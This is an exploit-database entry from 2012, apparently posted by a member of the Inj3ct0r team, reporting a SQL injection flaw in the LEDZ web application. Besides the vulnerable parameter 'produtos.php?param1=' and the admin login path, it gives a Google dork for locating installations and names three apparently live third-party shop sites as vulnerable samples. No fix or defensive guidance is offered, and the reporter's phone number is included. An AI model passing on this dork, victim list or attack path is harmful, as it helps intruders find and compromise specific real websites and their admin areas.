LEDZ - SQL Injection Vulnerability

2012-03-12T00:00:00
ID 1337DAY-ID-17681
Type zdt
Reporter the_cyber_nuxbie
Modified 2012-03-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

========================================================================
|||                LEDZ - SQL Injection Vulnerability                |||
========================================================================

- Discovered By:
||| TheCyberNuxbie - Independent Security Research |||
<<< [email protected] >>> CP: +62856-2538-963

- Info WebApps:
This Content Develop By:
http://www.ledz.com.br/

- Google Dork:
inurl:"/produtos.php?param1="

- Exploit Report:
http://lokalisasi/WebApps/produtos.php?param1=[SQL Injection]

- Private Area:
http://lokalisasi/WebApps/adm/ <--- LogIn Area...!!!

- Sample WebApps Vuln SQLi:
http://decoreshop.com.br/produtos.php?param1=3' + [SQL Injection]
http://missaoeco.com.br/produtos.php?param1=6' + [SQL Injection]
http://paparicando.com.br/produtos.php?param1=9' + [SQL Injection]

- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...

- Special Thanks:
Alloh SWT (GOD)
Mama & Papa,,,
All My Friends,,,

[ Inj3ct0r - Exploit-DB - PacketStormSecurity ]

Me @ Solo Raya, 12 March 2012 | 09:54 PM. Central Java, Indonesian.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2018-03-19]  #